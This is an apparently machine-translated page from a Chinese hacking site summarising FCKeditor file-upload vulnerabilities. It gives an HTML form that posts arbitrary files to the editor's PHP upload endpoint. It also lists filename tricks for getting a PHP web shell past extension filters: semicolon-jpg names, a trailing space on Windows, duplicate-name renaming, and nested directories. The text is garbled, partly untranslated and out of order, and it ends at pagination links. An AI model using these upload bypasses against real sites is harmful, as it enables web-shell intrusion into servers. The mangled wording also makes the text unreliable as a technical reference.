Fckeditor Common Vulnerability of the excavation with the use of a finishing summary-vulnerability warning-the black bar safety net

ID MYHACK58:62201452266
Type myhack58
Reporter 佚名
Modified 2014-08-10T00:00:00


View Editor Version


2. Version 2.2 version

Apache+linux environments in the upload files back plus a. Breakthrough! Test passed.

  1. Version <=2.4.2 For php in the processing PHP upload place and not the Media Type for uploading File Type Control, causing the user to upload any file! The following saved as an html file, modify the action address.

<form id="frmUpload" enctype="multipart/form-data"

action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>

<input type="file" name="NewFile" size="5 0"><br>

<input id="btnUpload" type="submit" value="Upload">


  1. FCKeditor file uploads“.” Change“_”underscores the bypass method

A lot of times the uploaded file for example: shell.php.rar 或shell.php;. jpg becomes shell_php;. jpg this is the new version of the FCK change.

4.1: the 提交 shell.php+space bypass

However, spaces only support win system is *nix is not supported[shell.php 和 shell.php+spaces is 2 different files not the test.

4.2: the 继续 上传 同名 文件 可变 为 shell.php;(1). jpg you can also create a new folder, only the detection of the first level of the directory, if the jump to a secondary directory is not limited.

[1] [2] [3] [4] [5] next